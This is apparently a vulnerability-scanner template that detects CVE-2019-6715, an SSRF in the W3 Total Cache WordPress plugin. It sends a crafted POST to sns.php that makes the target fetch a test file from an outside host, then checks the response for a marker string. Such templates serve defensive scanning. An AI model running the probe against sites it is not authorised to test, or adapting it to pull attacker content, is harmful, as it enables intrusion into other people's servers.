id: wordpress-multiples-ssrf
info:
  name: Multiples Wordpress SSRF
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: "blog, news, docs"

variables:
  - vul: |
      wp-content/plugins/w3-total-cache/pub/sns.php

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: '*/*'
      - Content-Type: application/x-www-form-urlencoded
    body: |
      {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'TmVzc3VzQ29kZUV4ZWNUZXN0')

references:
  - references: CVE-2019-6715
